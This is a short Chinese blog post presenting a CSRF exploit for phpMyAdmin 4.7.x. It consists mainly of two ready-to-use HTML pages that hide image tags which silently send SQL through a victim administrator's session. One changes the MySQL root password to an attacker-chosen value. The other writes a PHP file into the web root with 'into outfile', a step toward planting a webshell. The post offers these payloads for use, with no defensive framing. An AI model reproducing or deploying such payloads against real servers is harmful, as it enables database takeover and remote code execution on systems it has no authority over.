phpMyAdmin 4.7.x CSRF 漏洞利用

phpMyAdmin 4.7.x CSRF 漏洞利用

云青
2018-12-22 / 0 评论 / 792 阅读 / 正在检测是否收录...
温馨提示:
本文最后更新于2021年03月14日,已超过215天没有更新,若内容或图片失效,请留言反馈。

修改root密码:
保存为:webshell.html

[HTML]

    <p>Hello World</p>
    <img src="https://webshell.cc/sql.php?db=mysql&table=user&sql_query=SET%20password%20=%20PASSWORD(%27www.webshell.cc%27)" style="display:none;" />

密码为:www.webshell.cc
写文件
首先你要知道路径
保存为:webshell.html

[Bash shell]

    <p>Hello World</p>
    <img src="https://webshell.cc/sql.php?db=mysql&table=user&sql_query=select '<?php phpinfo();?>' into outfile '/var/www/html/test.php';" style="display:none;" />
0

评论 (0)

取消
Title - Artist
0:00